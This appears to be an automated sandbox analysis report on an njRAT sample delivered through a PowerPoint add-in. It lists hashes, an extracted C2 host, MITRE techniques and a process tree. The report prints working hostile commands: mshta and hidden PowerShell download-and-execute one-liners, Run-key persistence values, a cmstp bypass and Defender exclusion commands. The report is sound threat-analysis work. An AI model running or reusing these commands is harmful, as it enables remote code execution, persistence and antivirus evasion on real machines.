njrat | 856e1c3396dca23a3acd980b01a233faf7c785a829f6f573744939da863a38eb

Analysis

max time kernel
112s
max time network
136s
platform
windows10_x64
resource
win10-en-20211208
submitted
25-01-2022 21:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2bae03ea91a0d39390de51793348ed98404f5fe3bb11f8f340151657a1a3f669.ppam
Size

9KB
MD5

05fe4d5d400cc4d2a51542351f8c960c
SHA1

87d158c376769994cf98402edb9f3b7f0739f8c5
SHA256

2bae03ea91a0d39390de51793348ed98404f5fe3bb11f8f340151657a1a3f669
SHA512

94374d60e2bbc096cb47472960d1bf205dd86789dbc892e6268135302e74c3b95bcda7bb21b5d84548b90cc1f9fe5cef21d9de6f0ec80681aa53c6d523f5973f

Score

10^/10

njrat cpa evasion persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://www.j.mp/ahsdiahwidaiuwd

Extracted

Family

njrat

Version

v2.0

Botnet

CPA

mobibanewdan.duckdns.org:2525

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

Process spawned unexpected child process 41 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2644	2472	mshta.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3340	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1180	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2108	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2808	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4404	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4568	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4636	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4664	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4828	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5076	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4184	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4612	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4916	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1188	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5556	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4076	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5616	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	660	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5648	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5888	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6072	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6836	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7048	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6472	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6280	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5784	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6688	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5368	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6204	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5156	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6608	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6416	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5668	3988	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	3988	powershell.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 10 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
27	2644	mshta.exe
29	2644	mshta.exe
31	2644	mshta.exe
33	2644	mshta.exe
35	2644	mshta.exe
37	2644	mshta.exe
39	2644	mshta.exe
52	2188	powershell.exe
54	2188	powershell.exe
63	2188	powershell.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 5 IoCs

Processes:

aspnet_compiler.exeaspnet_compiler.exeaspnet_compiler.exeaspnet_compiler.exeaspnet_compiler.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	aspnet_compiler.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	aspnet_compiler.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	aspnet_compiler.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	aspnet_compiler.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	aspnet_compiler.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetwrixParam = "powershell -w h -nop -exec bypass -c start-sleep 2;(New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://mob1giga.blogspot.com/atom.xml').GetResponse().GetResponseStream())).ReadToEnd()\|I'e'x"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetwrixParam2 = "powershell -w h -nop -exec bypass -c start-sleep 2;(New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://mobgiga2.blogspot.com/atom.xml').GetResponse().GetResponseStream())).ReadToEnd()\|I'e'x"	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 2188 set thread context of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 set thread context of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 set thread context of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 set thread context of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 set thread context of 1852	2188	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1528 taskkill.exe

pid	process
1528	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2472 POWERPNT.EXE

pid	process
2472	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2036	powershell.exe
3340	powershell.exe
1808	powershell.exe
2036	powershell.exe
1808	powershell.exe
3340	powershell.exe
1180	powershell.exe
2036	powershell.exe
624	powershell.exe
1180	powershell.exe
3340	powershell.exe
1808	powershell.exe
2344	powershell.exe
1180	powershell.exe
2188	powershell.exe
624	powershell.exe
2108	powershell.exe
2108	powershell.exe
2344	powershell.exe
624	powershell.exe
2808	powershell.exe
2108	powershell.exe
2344	powershell.exe
2344	powershell.exe
2808	powershell.exe
2808	powershell.exe
4404	powershell.exe
4404	powershell.exe
2808	powershell.exe
4404	powershell.exe
4404	powershell.exe
4568	powershell.exe
4568	powershell.exe
4664	powershell.exe
4664	powershell.exe
4828	powershell.exe
4828	powershell.exe
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
4568	powershell.exe
4568	powershell.exe
4664	powershell.exe
4636	powershell.exe
4828	powershell.exe
4664	powershell.exe
4664	powershell.exe
5076	powershell.exe
5076	powershell.exe
4184	powershell.exe
4184	powershell.exe
4828	powershell.exe
4492	powershell.exe
4492	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetaskkill.exeaspnet_compiler.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	2380	aspnet_compiler.exe
Token: 33	2380	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2380	aspnet_compiler.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: 33	2380	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2380	aspnet_compiler.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeDebugPrivilege	5556	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeIncreaseQuotaPrivilege	2036	powershell.exe
Token: SeSecurityPrivilege	2036	powershell.exe
Token: SeTakeOwnershipPrivilege	2036	powershell.exe
Token: SeLoadDriverPrivilege	2036	powershell.exe
Token: SeSystemProfilePrivilege	2036	powershell.exe
Token: SeSystemtimePrivilege	2036	powershell.exe
Token: SeProfSingleProcessPrivilege	2036	powershell.exe
Token: SeIncBasePriorityPrivilege	2036	powershell.exe
Token: SeCreatePagefilePrivilege	2036	powershell.exe
Token: SeBackupPrivilege	2036	powershell.exe
Token: SeRestorePrivilege	2036	powershell.exe
Token: SeShutdownPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeSystemEnvironmentPrivilege	2036	powershell.exe
Token: SeRemoteShutdownPrivilege	2036	powershell.exe
Token: SeUndockPrivilege	2036	powershell.exe
Token: SeManageVolumePrivilege	2036	powershell.exe
Token: 33	2036	powershell.exe
Token: 34	2036	powershell.exe
Token: 35	2036	powershell.exe
Token: 36	2036	powershell.exe
Token: SeIncreaseQuotaPrivilege	1808	powershell.exe
Token: SeSecurityPrivilege	1808	powershell.exe
Token: SeTakeOwnershipPrivilege	1808	powershell.exe
Token: SeLoadDriverPrivilege	1808	powershell.exe
Token: SeSystemProfilePrivilege	1808	powershell.exe
Token: SeSystemtimePrivilege	1808	powershell.exe
Token: SeProfSingleProcessPrivilege	1808	powershell.exe
Token: SeIncBasePriorityPrivilege	1808	powershell.exe
Token: SeCreatePagefilePrivilege	1808	powershell.exe
Token: SeBackupPrivilege	1808	powershell.exe
Token: SeRestorePrivilege	1808	powershell.exe
Token: SeShutdownPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeSystemEnvironmentPrivilege	1808	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

2472 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEpowershell.exe

pid process

2472 POWERPNT.EXE
2472 POWERPNT.EXE
2472 POWERPNT.EXE
2188 powershell.exe
2188 powershell.exe

pid	process
2472	POWERPNT.EXE

pid	process
2472	POWERPNT.EXE
2472	POWERPNT.EXE
2472	POWERPNT.EXE
2188	powershell.exe
2188	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.exeWscript.execsc.exe

description	pid	process	target process
PID 2472 wrote to memory of 2644	2472	POWERPNT.EXE	mshta.exe
PID 2472 wrote to memory of 2644	2472	POWERPNT.EXE	mshta.exe
PID 2644 wrote to memory of 2188	2644	mshta.exe	powershell.exe
PID 2644 wrote to memory of 2188	2644	mshta.exe	powershell.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2380	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2800	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2800	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2800	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1188	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1408	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1408	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1408	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1432	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1612	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 1852	2188	powershell.exe	aspnet_compiler.exe
PID 2188 wrote to memory of 2984	2188	powershell.exe	cmstp.exe
PID 2188 wrote to memory of 2984	2188	powershell.exe	cmstp.exe
PID 2188 wrote to memory of 1304	2188	powershell.exe	csc.exe
PID 2188 wrote to memory of 1304	2188	powershell.exe	csc.exe
PID 2496 wrote to memory of 608	2496	Wscript.exe	Wscript.exe
PID 2496 wrote to memory of 608	2496	Wscript.exe	Wscript.exe
PID 1304 wrote to memory of 3844	1304	csc.exe	cvtres.exe
PID 1304 wrote to memory of 3844	1304	csc.exe	cvtres.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\2bae03ea91a0d39390de51793348ed98404f5fe3bb11f8f340151657a1a3f669.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\SYSTEM32\mshta.exe
mshta http://www.j.mp/ahsdiahwidaiuwd
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h (New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://www.mediafire.com/file/nga4gqkunvlk0dj/main.dll/file').GetResponse().GetResponseStream())).ReadToEnd()|I'e'x
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
PID:2800

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
- Drops startup file
PID:1188

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
PID:1408

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
- Drops startup file
PID:1432

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
- Drops startup file
PID:1612

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
- Drops startup file
PID:1852

\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\AppData\Local\Temp\CMSTP.inf
4⤵
PID:2984

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5f5wenr\e5f5wenr.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA26.tmp" "c:\Users\Admin\AppData\Local\Temp\e5f5wenr\CSC46FD75DB2A15476789E5E6A1729A5939.TMP"
5⤵
PID:3844

C:\Windows\system32\Wscript.exe
Wscript C:\Users\Public\hahahha.vbs
1⤵
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\system32\Wscript.exe
"C:\Windows\system32\Wscript.exe" "C:\Users\Public\hahahha.vbs" /elevate
2⤵
PID:608

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension ".bat"
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension ".ppam"
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension ".xls"
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension ".bat"
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension ".exe"
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension ".vbs"
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionExtension ".js"
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath D:\
1⤵
